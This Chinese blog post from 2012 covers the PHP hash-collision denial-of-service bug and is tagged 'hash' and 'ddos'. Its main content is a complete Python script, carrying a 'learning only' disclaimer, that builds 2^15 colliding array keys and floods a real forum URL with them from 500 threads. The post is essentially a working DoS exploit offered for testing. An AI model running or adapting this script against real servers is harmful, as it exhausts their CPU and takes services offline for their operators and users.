dennis的网络记事本
优化
首页
RSS
标签
边栏
链接
归档
RSS
hash code 碰撞bug
dennis
, 2012/01/03 15:07 ,
杂谈
,
评论(0)
,
阅读(613)
, Via 本站原创
大
|
中
|
小
引用地址:
注意:
该地址仅在今日23:59:59之前有效
ղص:
很严重的bug
漏洞详情见
http://bbs.linuxtone.org/thread-17843-1-1.html
附上测试代码一只py写的 测试php之用 请勿用作非法用途
#!/usr//bin/env python # -*- coding:utf-8 -*- #此脚本仅为学习测试之用,请勿用于非法用途 #LinuxTone<
http://bbs.linuxtone.org
>/dennis import pycurl import threading size=pow(2, 15) data='' max=(size-1)*size key=0 while key < max: data=data+'&array['+str(key)+']=0' key=key+size print "Hash End" data=data.lstrip('&') import StringIO def curl(): c=pycurl.Curl() c.setopt(pycurl.TRANSFERTEXT,True) c.setopt(pycurl.TIMEOUT,30) c.setopt(pycurl.CONNECTTIMEOUT,30) c.setopt(pycurl.HTTPHEADER,['Expect:']) c.setopt(pycurl.URL,'http://bbs.linuxtone.org/forum.php') c.setopt(pycurl.POST,True) c.setopt(pycurl.POSTFIELDS,data) b = StringIO.StringIO() c.setopt(pycurl.WRITEFUNCTION, b.write) try: c.perform() except pycurl.error: pass c.close() b.close() class curlpool(threading.Thread): def __init__(self,count): super(curlpool,self).__init__() self.count=count def run(self): print "Current Count is:%d" % self.count curl() if __name__ == '__main__': thread=[] for i in xrange(500): thread.append(curlpool(i)) for i in thread: i.start() for i in thread: i.join()
>
Tags:
hash
,
ddos
分析了下某webgame
公告
贵有恒何必三更眠五更起,最无益只怕一日曝十日寒
独学而无友,则孤陋而寡闻! Gtalk:smhchf#gmail.com
分类
LINUX
[40]
WEB
[7]
CACHE
[1]
Optimiz
[7]
MONITOR
[2]
DNS
[5]
VPN
[1]
小工具
[23]
WIDOWS
[2]
虚拟化
[9]
杂谈
[27]
自建网站
[5]
python
[29]
MYSQL
[2]
日历
<
2012
>
<
2
>
日
一
二
三
四
五
六
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
链接
默认链接组
Nginx模块中文参考
南通机械网
有奖积分小游戏
有奖积分小游戏
nmap中文Man
技术博客
麦乳精的博客
晓辉工作室
杯具蛋蛋面
关注JAVA
运维进行时
捧红趣事网
风继续吹
Bubby Room
5Love 每周广播
备忘链接
KVM管理平台
其他
登入
注册
RSS:
日志
|
评论
编码:UTF-8
XHTML 1.0